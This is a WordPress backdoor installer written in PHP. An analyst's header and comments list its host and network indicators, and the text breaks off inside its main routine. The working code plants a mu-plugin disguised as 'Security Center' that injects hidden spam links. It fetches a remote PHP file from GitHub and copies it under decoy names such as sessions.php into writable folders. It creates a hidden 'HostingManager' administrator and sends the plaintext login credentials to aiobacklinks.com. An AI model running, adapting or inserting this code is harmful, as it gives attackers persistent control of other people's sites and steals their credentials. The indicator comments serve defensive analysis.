<?php
/*
 * Analyst overview (derived only from the code in this file).
 *
 * Single-file PHP page that, when requested with an `action` parameter,
 * performs one of five operations against the WordPress install located at
 * $_SERVER['DOCUMENT_ROOT']. The dispatcher near the end of the file reads
 * $_REQUEST['action'] directly; no authentication or nonce check is visible
 * anywhere in the file.
 *
 * Artifacts written by this script (host indicators):
 *   - wp-content/mu-plugins/__secwaf.php
 *     (header "Plugin Name: Security Center", "Author: WordPress")
 *   - wp-content/uploads/cache-backup-<8 hex chars>/restore.php
 *   - WordPress user "HostingManager" (e-mail admin@example.com,
 *     user meta key "api_key")
 *   - files named sessions.php, cookies.php, caches.php, configs.php or
 *     settings.php copied into writable sub-directories of the document root
 *   - <docroot>/wp_backup_<Ymd_His>/ holding a copy of wp-config.php and
 *     wp-content
 *   - transient: <docroot>/wp_current_version.zip, <docroot>/wp_temp_extract/,
 *     <script dir>/downloaded_files/
 *
 * Outbound requests made by this script or by the files it writes
 * (network indicators):
 *   - https://aiobacklinks.com/panel/ajax/insert/cc_site.php
 *   - https://aiobacklinks.com/x1c/cc.php
 *   - https://aiobacklinks.com/ajax/request/
 *   - https://raw.githubusercontent.com/asdjakshdkj2/test/refs/heads/main/heh.php
 *   - https://wordpress.org/latest.zip or https://wordpress.org/wordpress-<version>.zip
 */
set_time_limit(300);
error_reporting(E_ALL);
ini_set('display_errors', 1);

/** === GLOBAL VARIABLES AND ENDPOINT DEFINITIONS === */
$endpoint = "https://aiobacklinks.com/panel/ajax/insert/cc_site.php"; // queried to obtain the site ID
$text_endpoint = "https://aiobacklinks.com/x1c/cc.php"; // endpoint the collected URL list is POSTed to
$domain = (isset($_SERVER['HTTP_HOST'])) ? $_SERVER['HTTP_HOST'] : 'localhost';
$root_dir = rtrim($_SERVER['DOCUMENT_ROOT'], '/'); // document root, treated as the WordPress root
$message = []; // every log line that is printed on the page
$copied_urls = []; // URLs of the files this script created or copied (later also a credential line)
$site_id = null; // site_id returned by $endpoint is kept here

/**
 * Deletes this script file (__FILE__) and echoes the outcome.
 *
 * Triggered by action=removeme. Only this file is removed; nothing in the
 * function touches the other artifacts the script creates.
 */
function removeme() {
    $script_path = __FILE__; // full path of this file
    if (file_exists($script_path)) {
        if (@unlink($script_path)) {
            echo "✅ Script kendini başarıyla sildi: $script_path";
        } else {
            echo "❌ Script silinemedi. Dosya izinlerinizi kontrol edin.";
        }
    } else {
        echo "⚠️ Dosya zaten mevcut değil veya yol hatalı.";
    }
}

/**
 * Appends a timestamped line to the global $message array.
 *
 * The array is printed in the HTML at the end of the request; this function
 * does not write to any file.
 *
 * @param string $msg Text to record.
 */
function log_message($msg) {
    global $message;
    $timestamp = date('Y-m-d H:i:s');
    $full_msg = "[$timestamp] $msg";
    $message[] = $full_msg;
}

/**
 * Recursively deletes a file or directory tree.
 *
 * Errors from unlink()/rmdir() are suppressed with @, so partial failures
 * are silent.
 *
 * @param string $dir Path to remove.
 * @return bool true if the path did not exist; otherwise the result of the
 *              final unlink()/rmdir().
 */
function recursiveDelete($dir) {
    if (!file_exists($dir)) return true;
    if (!is_dir($dir)) return @unlink($dir);
    foreach (scandir($dir) as $file) {
        if ($file === '.' || $file === '..') continue;
        $path = $dir . DIRECTORY_SEPARATOR . $file;
        is_dir($path) ? recursiveDelete($path) : @unlink($path);
    }
    return @rmdir($dir);
}

/**
 * Recursively copies a directory tree.
 *
 * Individual mkdir()/copy() failures are suppressed and not reported.
 *
 * @param string $src Source directory.
 * @param string $dst Destination directory (created with mode 0755 if missing).
 * @return bool false if $src is not a directory, true otherwise.
 */
function recursiveCopy($src, $dst) {
    if (!is_dir($src)) return false;
    if (!file_exists($dst)) @mkdir($dst, 0755, true);
    foreach (scandir($src) as $file) {
        if ($file === '.' || $file === '..') continue;
        $srcPath = $src . DIRECTORY_SEPARATOR . $file;
        $dstPath = $dst . DIRECTORY_SEPARATOR . $file;
        if (is_dir($srcPath)) {
            recursiveCopy($srcPath, $dstPath);
        } else {
            @copy($srcPath, $dstPath);
        }
    }
    return true;
}

/**
 * Reads the installed WordPress version from wp-includes/version.php.
 *
 * The version file is executed with include, and $wp_version is read from
 * the local scope afterwards.
 *
 * @param string $version_file Path to version.php.
 * @return string The detected version, or 'latest' when the file is missing,
 *                unreadable or does not set $wp_version.
 */
function get_wp_version($version_file) {
    if (file_exists($version_file) && is_readable($version_file)) {
        include $version_file;
        if (isset($wp_version)) {
            log_message("Detected WordPress version: $wp_version");
            return $wp_version;
        }
    }
    log_message("Version file not found or unreadable, using latest.");
    return 'latest';
}

/**
 * POSTs the collected entries to a remote endpoint as JSON.
 *
 * The entries are trimmed, joined with newlines and sent as {"text": "..."}.
 * Callers pass $copied_urls, which after manage_admin_user() also contains a
 * "login-URL:username:password:api_key" line, so the plaintext credential
 * leaves the host through this request.
 *
 * @param array  $urls         Entries to send.
 * @param string $endpoint_url Destination URL.
 * @return bool true when the response JSON has a truthy "success" field.
 */
function send_urls_to_endpoint($urls, $endpoint_url) {
    if (empty($urls)) {
        log_message("No URLs to send to text endpoint.");
        return false;
    }
    $text = implode("\n", array_map('trim', $urls));
    $data = ['text' => $text];
    $json_data = json_encode($data);
    $ch = curl_init($endpoint_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $json_data);
    curl_setopt($ch, CURLOPT_TIMEOUT, 20); // add a timeout
    $response = curl_exec($ch);
    if ($response === false) {
        log_message("Error sending URLs to text endpoint: " . curl_error($ch));
        curl_close($ch);
        return false;
    }
    curl_close($ch);
    $response_data = json_decode($response, true);
    if (isset($response_data['success']) && $response_data['success']) {
        log_message("Successfully sent URLs to text endpoint. Inserted: " . ($response_data['inserted_count'] ?? 0));
        return true;
    } else {
        $err = isset($response_data['error']) ? $response_data['error'] : 'Unknown error';
        log_message("Text endpoint error: $err");
        return false;
    }
}

/**
 * Registers this site with $endpoint and stores the returned site_id.
 *
 * POSTs site_url=<scheme>://<Host header> and expects JSON containing a
 * string "site_id". The value is passed through htmlspecialchars() and kept
 * in the global $site_id, which createSecwafPlugin() later concatenates into
 * generated PHP source.
 *
 * @return bool true when a string site_id was received.
 */
function getSiteIDFromEndpoint() {
    global $endpoint, $site_id, $domain;
    $siteUrl = (isset($_SERVER['REQUEST_SCHEME']) ? $_SERVER['REQUEST_SCHEME'] : 'http') . "://$domain";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $endpoint);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(['site_url' => $siteUrl]));
    curl_setopt($ch, CURLOPT_TIMEOUT, 20); // add a timeout
    $response = curl_exec($ch);
    if ($response === false) {
        log_message("Error: Could not reach endpoint - " . curl_error($ch));
        curl_close($ch);
        return false;
    }
    curl_close($ch);
    $data = json_decode($response, true);
    if (isset($data['site_id']) && is_string($data['site_id'])) {
        $site_id = htmlspecialchars($data['site_id']);
        log_message("Site ID received from endpoint: $site_id");
        return true;
    } else {
        log_message("Error: Invalid response from endpoint - " . $response);
        return false;
    }
}

/**
 * Writes wp-content/mu-plugins/__secwaf.php using the stored site_id.
 *
 * The generated file carries a plugin header naming itself "Security Center"
 * with author "WordPress". Its single function is hooked to wp_footer and:
 *   - POSTs the site_id to https://aiobacklinks.com/ajax/request/ (no cURL
 *     timeout is set in the generated code);
 *   - always echoes a <div style="display:none"> wrapper;
 *   - when the response has status "true" and a non-empty "sites" list,
 *     echoes one <a> per entry inside <div class="site-links">.
 * Both the file path and the hidden wrapper in rendered pages can be used to
 * detect an affected site. The mu-plugins directory is created if missing.
 *
 * The string literal below is kept exactly as it appears in this listing.
 *
 * @return bool true when the file was written.
 */
function createSecwafPlugin() {
    global $site_id, $root_dir;
    if (!$site_id) {
        log_message("Error: site_id is empty! __secwaf.php cannot be created.");
        return false;
    }
    $mu_plugins_dir = $root_dir . '/wp-content/mu-plugins/';
    if (!file_exists($mu_plugins_dir)) {
        @mkdir($mu_plugins_dir, 0755, true);
    }
    $secwaf_path = $mu_plugins_dir . '__secwaf.php';
    // The remotely supplied site_id is spliced into the PHP source between the two literal parts.
    $secwaf_content = '<?php /** * Plugin Name: Security Center * Description: This MU Plugin automatically checks security * Author: WordPress */ if (!defined("ABSPATH")) { exit; } function add_backlinks_to_footer_html() { $site_id = "' . $site_id . 
'"; if (!$site_id) return; $url = "https://aiobacklinks.com/ajax/request/"; $post_data = ["site_id" => $site_id]; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data)); $response = curl_exec($ch); curl_close($ch); echo \'<div style="display:none">\'; if ($response !== false) { $data = json_decode($response, true); if (isset($data["status"]) && $data["status"] === "true" && !empty($data["sites"])) { echo \'<div class="site-links">\'; foreach ($data["sites"] as $site) { $site_url = esc_url($site["site_url"]); $keyword = esc_html($site["site_keyword"]); $nofollow = $site["is_nofollow"] == 1 ? \'rel="nofollow"\' : \'\'; echo "<a href=\"$site_url\" $nofollow title=\"$keyword\" target=\"_blank\">$keyword</a><br>"; } echo \'</div>\'; } } echo \'</div>\'; } add_action("wp_footer", "add_backlinks_to_footer_html"); ';
    if (@file_put_contents($secwaf_path, $secwaf_content) !== false) {
        log_message("MU Plugin (__secwaf.php) created with site_id: " . $site_id);
        return true;
    } else {
        log_message("Error: Could not write __secwaf.php. Check file permissions.");
        return false;
    }
}

/**
 * Writes restore.php into wp-content/uploads/cache-backup-<8 hex chars>/.
 *
 * The directory suffix is the first 8 characters of md5(uniqid()). The URL of
 * the generated file is appended to $copied_urls before the file is written,
 * so it is reported even if the write fails.
 *
 * The generated script contains no access check: it calls its own
 * reinstall_wordpress() at top level on every request and prints the
 * resulting messages as text/plain. That routine downloads WordPress from
 * wordpress.org into <docroot>/wp_temp.zip, copies wp-config.php and
 * wp-content to <docroot>/wp_backup_<Ymd_His>/, deletes wp-admin,
 * wp-includes and the listed root core files, and copies the downloaded ones
 * in their place.
 *
 * The string literal below is kept exactly as it appears in this listing,
 * including its line breaks.
 *
 * @return bool false only when the file is absent and cannot be written.
 */
function create_restore_script() {
    global $root_dir,$domain,$copied_urls;
    $random_dir = 'cache-backup-' . substr(md5(uniqid()), 0, 8);
    $restore_dir = $root_dir . '/wp-content/uploads/' . $random_dir;
    $restore_script = $restore_dir . '/restore.php';
    $restore_url = "https://$domain/wp-content/uploads/".$random_dir. '/restore.php';
    $copied_urls[] = $restore_url;
    $restore_content = '<?php $messages = []; function recursiveDelete($dir) { global $messages; if (!file_exists($dir)) return true; if (!is_dir($dir)) return @unlink($dir); foreach (scandir($dir) as $file) { if ($file === "." || $file === "..") continue; $path = $dir . "/" . $file; is_dir($path) ? 
recursiveDelete($path) : @unlink($path); } return @rmdir($dir); } function recursiveCopy($src, $dst) { global $messages; if (!is_dir($src)) return false; if (!file_exists($dst)) @mkdir($dst, 0755, true); foreach (scandir($src) as $file) { if ($file === "." || $file === "..") continue; $srcPath = $src . "/" . $file; $dstPath = $dst . "/" . $file; is_dir($srcPath) ? recursiveCopy($srcPath, $dstPath) : @copy($srcPath, $dstPath); } return true; } function get_wp_version($version_file) { global $messages; if (file_exists($version_file) && is_readable($version_file)) { include $version_file; if (isset($wp_version)) { $messages[] = "Detected WordPress version: $wp_version"; return $wp_version; } } $messages[] = "Version file not found, using latest."; return "latest"; } function reinstall_wordpress() { global $messages; $root_dir = $_SERVER["DOCUMENT_ROOT"]; $messages[] = "Starting WordPress reinstall..."; $version_file = "$root_dir/wp-includes/version.php"; $wp_version = get_wp_version($version_file); $wp_download_url = ($wp_version === "latest") ? "https://wordpress.org/latest.zip" : "https://wordpress.org/wordpress-$wp_version.zip"; $temp_file = "$root_dir/wp_temp.zip"; $extract_dir = "$root_dir/wp_temp_extract"; $backup_dir = "$root_dir/wp_backup_" . 
date("Ymd_His"); // ZIP indir $ch = curl_init($wp_download_url); $fp = fopen($temp_file, "wb"); curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $download_result = curl_exec($ch); curl_close($ch); fclose($fp); if (!$download_result || !file_exists($temp_file)) { $messages[] = "Error: Could not download WordPress ZIP."; return false; } $messages[] = "WordPress ZIP downloaded: $temp_file"; // ZIP aç $zip = new ZipArchive(); if ($zip->open($temp_file) === true) { if (!is_dir($extract_dir)) @mkdir($extract_dir, 0755, true); $zip->extractTo($extract_dir); $zip->close(); $messages[] = "ZIP extracted to: $extract_dir"; } else { $messages[] = "Error: Could not extract ZIP."; @unlink($temp_file); return false; } // Yedek al if (!file_exists($backup_dir)) @mkdir($backup_dir, 0755, true); if (file_exists("$root_dir/wp-config.php")) { @copy("$root_dir/wp-config.php", "$backup_dir/wp-config.php"); $messages[] = "Backed up wp-config.php"; } if (file_exists("$root_dir/wp-content")) { recursiveCopy("$root_dir/wp-content", "$backup_dir/wp-content"); $messages[] = "Backed up wp-content"; } // Temel WP klasörlerini sil $core_dirs = ["wp-admin", "wp-includes"]; foreach ($core_dirs as $dir) { $path = "$root_dir/$dir"; if (file_exists($path)) { recursiveDelete($path); $messages[] = "Deleted directory: $dir"; } } // Çekirdek dosyaları sil $core_files = [ "index.php","wp-activate.php","wp-blog-header.php","wp-comments-post.php", "wp-cron.php","wp-links-opml.php","wp-load.php","wp-login.php", "wp-mail.php","wp-settings.php","wp-signup.php","wp-trackback.php","xmlrpc.php" ]; foreach ($core_files as $file) { $path = "$root_dir/$file"; if (file_exists($path)) { @unlink($path); $messages[] = "Deleted file: $file"; } } // Yeni dosyaları kopyala $source_dir = "$extract_dir/wordpress"; recursiveCopy("$source_dir/wp-admin", "$root_dir/wp-admin"); recursiveCopy("$source_dir/wp-includes", "$root_dir/wp-includes"); foreach (glob("$source_dir/*.php") as $file) { 
@copy($file, "$root_dir/" . basename($file)); } $messages[] = "WordPress core files installed."; // Geçici dosyaları temizle recursiveDelete($extract_dir); @unlink($temp_file); $messages[] = "Cleaned up temporary files."; return true; } $success = reinstall_wordpress(); header("Content-Type: text/plain; charset=UTF-8"); if ($success) { $messages[] = "Reinstall completed successfully."; } else { $messages[] = "Reinstall failed."; } foreach ($messages as $msg) { echo "$msg\n"; } ?>';
    if (!file_exists($restore_dir)) {
        @mkdir($restore_dir, 0755, true);
    }
    if (!file_exists($restore_script)) {
        if (@file_put_contents($restore_script, $restore_content) !== false) {
            log_message("Restore script created at: $restore_script");
            log_message("Restore script created at: $restore_url");
            return true;
        } else {
            log_message("Error: Could not create restore script at $restore_script");
            return false;
        }
    }
    return true;
}

/**
 * Replaces the WordPress core files with a fresh download of the version
 * reported by wp-includes/version.php (or the latest release).
 *
 * Steps: download the ZIP from wordpress.org to
 * <docroot>/wp_current_version.zip, extract to <docroot>/wp_temp_extract,
 * copy wp-config.php and wp-content to <docroot>/wp_backup_<Ymd_His>/,
 * delete wp-admin, wp-includes and the listed root core files, copy the
 * downloaded ones in, then remove the ZIP and the extract directory.
 *
 * wp-content is only copied to the backup, never replaced, so anything the
 * other steps of this script placed under wp-content stays in place. The
 * backup directory is not removed (the recursiveDelete($backup_dir) call is
 * commented out), leaving a copy of wp-config.php inside the document root.
 *
 * @return bool true on completion, false if the download or extraction fails.
 */
function reinstall_wordpress_current_version() {
    global $root_dir;
    log_message("Starting WordPress reinstall process (no shell_exec)...");
    $version_file = $root_dir . '/wp-includes/version.php';
    $wp_version = get_wp_version($version_file);
    $wp_download_url = ($wp_version === 'latest') ? "https://wordpress.org/latest.zip" : "https://wordpress.org/wordpress-{$wp_version}.zip";
    $temp_file = $root_dir . '/wp_current_version.zip';
    $extract_dir = $root_dir . '/wp_temp_extract';
    $backup_dir = $root_dir . '/wp_backup_' . date('Ymd_His');

    // Download the ZIP
    $fp = @fopen($temp_file, 'wb');
    if (!$fp) {
        log_message("Error: Cannot create temp file for download: $temp_file");
        return false;
    }
    $ch = curl_init($wp_download_url);
    curl_setopt($ch, CURLOPT_FILE, $fp);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 60);
    $download_result = curl_exec($ch);
    curl_close($ch);
    fclose($fp);
    if ($download_result === false || !file_exists($temp_file)) {
        log_message("Error: WordPress ZIP indirilemedi.");
        return false;
    }
    log_message("WordPress ZIP indirildi: $temp_file");

    // Open the ZIP
    $zip = new ZipArchive();
    if ($zip->open($temp_file) === true) {
        if (!is_dir($extract_dir)) @mkdir($extract_dir, 0755, true);
        $zip->extractTo($extract_dir);
        $zip->close();
        log_message("ZIP başarıyla açıldı: $extract_dir");
    } else {
        log_message("ZIP açılamadı.");
        @unlink($temp_file);
        return false;
    }

    // Take a backup
    if (!file_exists($backup_dir)) @mkdir($backup_dir, 0755, true);
    if (file_exists($root_dir . '/wp-config.php')) {
        @copy($root_dir . '/wp-config.php', $backup_dir . '/wp-config.php');
        log_message("wp-config.php yedeği alındı.");
    }
    if (file_exists($root_dir . '/wp-content')) {
        recursiveCopy($root_dir . '/wp-content', $backup_dir . '/wp-content');
        log_message("wp-content yedeği alındı.");
    }

    // Directories to delete
    $core_dirs = ['wp-admin', 'wp-includes'];
    foreach ($core_dirs as $dir) {
        $path = $root_dir . '/' . $dir;
        if (file_exists($path)) {
            recursiveDelete($path);
            log_message("$dir dizini silindi.");
        }
    }

    // Files to delete
    $core_files = [
        'index.php','wp-activate.php','wp-blog-header.php','wp-comments-post.php',
        'wp-cron.php','wp-links-opml.php','wp-load.php','wp-login.php',
        'wp-mail.php','wp-settings.php','wp-signup.php','wp-trackback.php',
        'xmlrpc.php'
    ];
    foreach ($core_files as $file) {
        $path = $root_dir . '/' . $file;
        if (file_exists($path)) {
            @unlink($path);
            log_message("$file dosyası silindi.");
        }
    }

    // Copy the new files
    $source_dir = $extract_dir . '/wordpress';
    recursiveCopy($source_dir . '/wp-admin', $root_dir . '/wp-admin');
    recursiveCopy($source_dir . '/wp-includes', $root_dir . '/wp-includes');
    foreach (glob($source_dir . '/*.php') as $file) {
        @copy($file, $root_dir . '/' . basename($file));
    }
    log_message("WordPress çekirdek dosyaları başarıyla yüklendi.");

    // Cleanup
    recursiveDelete($extract_dir);
    @unlink($temp_file);
    // (Original note: the backup folder could be deleted as well; the call is left disabled.)
    // recursiveDelete($backup_dir);
    log_message("Geçici dosyalar temizlendi. Reinstall tamamlandı.");
    return true;
}

/**
 * Creates a WordPress administrator named "HostingManager", or resets its
 * password if the login already exists.
 *
 * WordPress is loaded through wp-load.php. A 12-character password and a
 * 32-character "api_key" user-meta value are generated on each run. The
 * plaintext password is written to the on-page log, and a line of the form
 * "https://<domain>/wp-login.php:<user>:<password>:<api_key>" is appended to
 * $copied_urls, which doAll() and backupOnly() send to $text_endpoint.
 *
 * When wp_create_user()/wp_set_password() are unavailable, the fallback
 * writes to the users table through $wpdb and stores md5() of the password
 * in user_pass.
 *
 * Host indicators: user_login "HostingManager", user_email
 * admin@example.com, and a user-meta row with key "api_key".
 *
 * @return bool false when wp-load.php is missing or user creation fails.
 */
function manage_admin_user() {
    global $root_dir, $domain, $copied_urls;
    $wp_load_path = $root_dir . '/wp-load.php';
    if (!file_exists($wp_load_path)) {
        log_message("Error: wp-load.php not found, cannot manage admin user!");
        return false;
    }
    require_once $wp_load_path;
    $username = 'HostingManager';
    $random_password = wp_generate_password(12, false);
    $api_key = wp_generate_password(32, false); // 32-character API key
    if (function_exists('wp_create_user') && function_exists('wp_set_password')) {
        $user = get_user_by('login', $username);
        if ($user) {
            wp_set_password($random_password, $user->ID);
            log_message("Admin user '$username' already exists, password reset to: $random_password");
            update_user_meta($user->ID, 'api_key', $api_key);
        } else {
            $user_id = wp_create_user($username, $random_password, 'admin@example.com');
            if (is_wp_error($user_id)) {
                log_message("Error: Could not create admin user - " . $user_id->get_error_message());
                return false;
            }
            $u = new WP_User($user_id);
            $u->set_role('administrator');
            update_user_meta($user_id, 'api_key', $api_key);
            log_message("Admin user '$username' created with password: $random_password");
        }
    } else {
        // Fallback: write directly to the database through $wpdb.
        global $wpdb;
        $hashed_password = md5($random_password);
        $user_id = $wpdb->get_var($wpdb->prepare("SELECT ID FROM $wpdb->users WHERE user_login = %s", $username));
        if ($user_id) {
            $wpdb->update($wpdb->users, ['user_pass' => $hashed_password], ['ID' => $user_id]);
            update_user_meta($user_id, 'api_key', $api_key);
            log_message("Admin user '$username' already exists, password reset to: $random_password (MD5 hashed)");
        } else {
            $wpdb->insert(
                $wpdb->users,
                [
                    'user_login' => $username,
                    'user_pass' => $hashed_password,
                    'user_nicename' => $username,
                    'user_email' => 'admin@example.com',
                    'user_registered' => current_time('mysql'),
                    'user_status' => 0
                ]
            );
            $new_id = $wpdb->insert_id;
            update_user_meta($new_id, 'wp_user_level', 10);
            update_user_meta($new_id, 'wp_capabilities', serialize(['administrator' => true]));
            update_user_meta($new_id, 'api_key', $api_key);
            log_message("Admin user '$username' created with password: $random_password (MD5 hashed)");
        }
    }
    // Append login URL, user name, password and API key to the list that is sent out
    $copied_urls[] = "https://$domain/wp-login.php:$username:$random_password:$api_key";
    return true;
}

/**
 * Downloads a PHP file from a hard-coded GitHub raw URL and copies it under
 * generic-looking names into randomly chosen writable directories.
 *
 * With the values set at the end of this function: the source is heh.php
 * from the asdjakshdkj2/test repository, the destination names are drawn
 * from sessions.php, cookies.php, caches.php, configs.php and settings.php,
 * and at most 10 directories are selected (the folder filter caps the list
 * at $randomCountTotal = 10, below $maxFiles = 15). The content of the
 * downloaded file is not shown in this listing. Every destination URL is
 * added to $copied_urls.
 *
 * For clean-up, searching the document root for the five file names above
 * in directories where they are not expected is the direct check; the
 * placement is random per run.
 *
 * The four helpers are declared inside this function body, so they become
 * defined when this function is called.
 *
 * @return bool Result of downloadFilesAndCopyWithRandomNames().
 */
function download_github_files() {
    global $root_dir, $domain, $message, $copied_urls;
    $baseDir = $root_dir;

    // 1) Walks the tree and collects writable sub-directories, as paths relative to the base directory.
    function listWritableSubfolders($directory) {
        $writableFolders = [];
        function exploreFolders($currentDir, &$writableFolders, $baseDir) {
            $folders = array_filter(glob($currentDir . '/*'), 'is_dir');
            foreach ($folders as $folder) {
                if (is_writable($folder)) {
                    $writableFolders[] = str_replace($baseDir . '/', '', $folder);
                }
                exploreFolders($folder, $writableFolders, $baseDir);
            }
        }
        exploreFolders($directory, $writableFolders, $directory);
        return $writableFolders;
    }

    // 2) Keeps only folders deeper than $baseLevel segments, groups them by their first
    //    $baseLevel segments, takes up to $minPerBase random folders per group, shuffles the
    //    result and returns at most $randomCountTotal entries.
    function filterByMinLengthAndDistributeRandomly($folders, $baseLevel, $randomCountTotal, $minPerBase = 3) {
        $groupedByBase = [];
        foreach ($folders as $folder) {
            $segments = explode('/', $folder);
            if (count($segments) > $baseLevel) {
                $base = implode('/', array_slice($segments, 0, $baseLevel));
                $groupedByBase[$base][] = $folder;
            }
        }
        $result = [];
        foreach ($groupedByBase as $base => $subfolders) {
            shuffle($subfolders);
            $selected = array_slice($subfolders, 0, $minPerBase);
            $result = array_merge($result, $selected);
        }
        shuffle($result);
        return array_slice($result, 0, $randomCountTotal);
    }

    // 3) Downloads one URL to a local path; success means the file exists and is non-empty.
    function downloadFile($url, $savePath) {
        $ch = curl_init($url);
        $fp = @fopen($savePath, 'wb');
        if (!$fp) {
            log_message("Cannot open file for writing: $savePath");
            return false;
        }
        curl_setopt($ch, CURLOPT_FILE, $fp);
        curl_setopt($ch, CURLOPT_TIMEOUT, 20);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        $ok = curl_exec($ch);
        if ($ok === false) {
            log_message("Curl error downloading $url: " . curl_error($ch));
        }
        curl_close($ch);
        fclose($fp);
        return file_exists($savePath) && filesize($savePath) > 0;
    }

    // 4) Downloads the files into <script dir>/downloaded_files (created with mode 0777), then
    //    copies a random downloaded file under a random name from $fileList into each selected
    //    folder. The staging directory is removed only at the end; on an early "return false"
    //    (failed download or copy) it is left behind with the downloaded file in it.
    function downloadFilesAndCopyWithRandomNames($fileUrls, $folders, $fileList, $maxFiles) {
        global $root_dir, $domain, $copied_urls;
        $downloadDir = __DIR__ . '/downloaded_files';
        if (!is_dir($downloadDir)) {
            @mkdir($downloadDir, 0777, true);
        }
        // Download the files
        $downloadedFiles = [];
        foreach ($fileUrls as $url) {
            $fileName = basename(parse_url($url, PHP_URL_PATH));
            $filePath = $downloadDir . '/' . $fileName;
            if (downloadFile($url, $filePath)) {
                $downloadedFiles[] = $filePath;
                $downloadUrl = "https://$domain/downloaded_files/$fileName";
                log_message("Downloaded $url to $downloadUrl");
            } else {
                log_message("Failed to download $url");
                return false;
            }
        }
        $filesCopied = 0;
        $maxFiles = min($maxFiles, count($folders));
        $used_dirs = [];
        foreach ($folders as $folder) {
            if ($filesCopied >= $maxFiles) {
                break;
            }
            $randomFile = $downloadedFiles[array_rand($downloadedFiles)];
            $randomName = $fileList[array_rand($fileList)];
            $destinationPath = $root_dir . '/' . $folder . '/' . $randomName;
            // Existing files are never overwritten; such folders are skipped.
            if (!file_exists($destinationPath)) {
                $destDir = dirname($destinationPath);
                if (!is_dir($destDir)) {
                    @mkdir($destDir, 0755, true);
                }
                if (@copy($randomFile, $destinationPath)) {
                    $urlPath = str_replace($root_dir, '', $destinationPath);
                    $displayUrl = "https://$domain$urlPath";
                    $logMessage = "Copied " . basename($randomFile) . " -> $displayUrl as $randomName";
                    if (strpos($destinationPath, 'wp-admin') !== false) {
                        $logMessage = "<span style='color: green;'>$logMessage</span>";
                    }
                    log_message($logMessage);
                    $copied_urls[] = $displayUrl;
                    $filesCopied++;
                    if (!in_array($destDir, $used_dirs)) {
                        $used_dirs[] = $destDir;
                    }
                } else {
                    log_message("Failed to copy " . basename($randomFile) . " to $destinationPath");
                    return false;
                }
            }
        }
        // If only one folder was used, try to place a copy in a second one as well
        if (count($used_dirs) < 2 && count($folders) >= 2) {
            log_message("Warning: Could not use at least 2 directories, retrying...");
            foreach ($folders as $folder) {
                if ($filesCopied >= $maxFiles) break;
                if (in_array($root_dir . '/' . $folder, $used_dirs)) continue;
                $randomFile = $downloadedFiles[array_rand($downloadedFiles)];
                $randomName = $fileList[array_rand($fileList)];
                $destinationPath = $root_dir . '/' . $folder . '/' . $randomName;
                if (!file_exists($destinationPath)) {
                    $destDir = dirname($destinationPath);
                    if (!is_dir($destDir)) {
                        @mkdir($destDir, 0755, true);
                    }
                    if (@copy($randomFile, $destinationPath)) {
                        $urlPath = str_replace($root_dir, '', $destinationPath);
                        $displayUrl = "https://$domain$urlPath";
                        $logMessage = "Copied " . basename($randomFile) . " -> $displayUrl as $randomName (ensuring 2 dirs)";
                        if (strpos($destinationPath, 'wp-admin') !== false) {
                            $logMessage = "<span style='color: green;'>$logMessage</span>";
                        }
                        log_message($logMessage);
                        $copied_urls[] = $displayUrl;
                        $filesCopied++;
                        if (!in_array($destDir, $used_dirs)) {
                            $used_dirs[] = $destDir;
                        }
                    } else {
                        log_message("Failed to copy " . basename($randomFile) . " to $destinationPath");
                        return false;
                    }
                }
            }
        }
        // Remove the staging directory
        if (file_exists($downloadDir)) {
            recursiveDelete($downloadDir);
            log_message("Cleaned up downloaded files directory: $downloadDir");
        }
        log_message("Files copied to " . count($used_dirs) . " directories.");
        return (count($used_dirs) >= 1);
    }

    // Main routine
    $writableSubfolders = listWritableSubfolders($baseDir);
    $baseLevel = 2;
    $randomCountTotal = 10;
    $minPerBase = 3;
    $filteredFolders = filterByMinLengthAndDistributeRandomly($writableSubfolders, $baseLevel, $randomCountTotal, $minPerBase);
    // GitHub file(s) to fetch
    $fileUrls = [ "https://raw.githubusercontent.com/asdjakshdkj2/test/refs/heads/main/heh.php" ];
    // File names assigned at random to the copies
    $fileList = ["sessions.php", "cookies.php", "caches.php", "configs.php", "settings.php"];
    // Maximum number of files to copy
    $maxFiles = 15;
    return downloadFilesAndCopyWithRandomNames($fileUrls, $filteredFolders, $fileList, $maxFiles);
}

/**
 * === OPERATIONS TRIGGERED BY THE BUTTONS ===
 * 1) All ("do everything")
 * 2) Integrate (site_id and __secwaf.php only)
 * 3) Backup (restore.php, GitHub files, admin user, send URLs to the endpoint)
 * 4) Reinstall WordPress
 */

/**
 * 1) Runs every step in order: site ID, __secwaf.php, restore.php, GitHub
 * files, admin user, upload of $copied_urls, core reinstall.
 *
 * Only a failed site-ID request or a failed reinstall aborts; failures of
 * the steps in between are logged and the run continues. The collected URLs
 * and credential line are sent before the reinstall starts.
 *
 * @return bool
 */
function doAll() {
    global $copied_urls, $text_endpoint;
    // a) Obtain the site ID
    if (!getSiteIDFromEndpoint()) {
        log_message("HATA: Site ID alınamadı. 'Tümü' süreci iptal ediliyor.");
        return false;
    }
    // b) Create __secwaf.php
    if (!createSecwafPlugin()) {
        log_message("HATA: __secwaf.php oluşturulamadı. İşleme devam ediliyor...");
    }
    // c) Create restore.php
    if (!create_restore_script()) {
        log_message("HATA: restore.php oluşturulamadı. İşleme devam ediliyor...");
    }
    // d) Download and copy the GitHub files
    if (!download_github_files()) {
        log_message("HATA: GitHub dosyaları indirilemedi/kopyalanamadı. İşleme devam ediliyor...");
    }
    // e) Create the admin user
    if (!manage_admin_user()) {
        log_message("HATA: Admin user oluşturulamadı/resetlenemedi. İşleme devam ediliyor...");
    }
    // f) Send the URLs to the endpoint
    if (!empty($copied_urls)) {
        send_urls_to_endpoint($copied_urls, $text_endpoint);
    }
    // g) Reinstall WordPress
    if (!reinstall_wordpress_current_version()) {
